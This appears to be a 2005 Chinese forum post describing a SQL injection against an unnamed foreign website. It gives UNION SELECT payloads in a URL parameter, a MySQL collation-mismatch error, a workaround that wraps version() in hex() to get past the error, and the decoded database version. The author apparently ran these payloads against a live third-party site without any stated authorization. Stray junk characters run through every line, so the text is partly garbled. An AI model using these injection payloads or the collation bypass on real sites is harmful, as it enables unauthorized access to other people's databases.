本文作者:SuperHei7 i& T4 D( j5 p* G
文章性质:原创
3 N' n' i" h# I' |9 z发布日期:2005-10-18! e, G6 k9 [; U( E1 U! J
测试个国外的站时:, Q; f. c: T. T- B
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*" K. ?4 b( K4 l
返回错误:
9 }$ }; l& B) q( E7 ?Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
( i5 ?, d3 Y) t z3 y# }MySQL Error No. 126( I- e' R# r* d" B
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
8 \+ a" X+ t8 i! T解决办法:转为其他编码如hex。$ P% j+ ]7 W8 B8 C8 W; ?9 q
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*& F7 f4 f4 `1 m/ L; R7 Y
成功得到hex(version())的值为:! M0 \9 R% u7 c( o& ^- m! X2 l
342E312E332D626574610 O+ e6 c1 V% @0 h: J; r
回Mysql查询下得到:
! r( y$ \+ ~. v( k4 Pmysql> select 0x342E312E332D62657461;
! y9 p" O) G3 B8 d) u5 L h+------------------------+' s1 Q- m+ g2 U B( S( e" w
| 0x342E312E332D62657461 |5 K" T* r& i2 t6 X( R9 w/ p
+------------------------+8 l6 i: [: T# H+ [( U
| 4.1.3-beta |& D$ m j) Y x
+------------------------+
# L9 S, r0 R( A8 Z$ h0 b1 row in set (0.00 sec)
; p% k: B) C8 w; w; A; _1 u3 f) b3 h2 g5 y! y3 r
|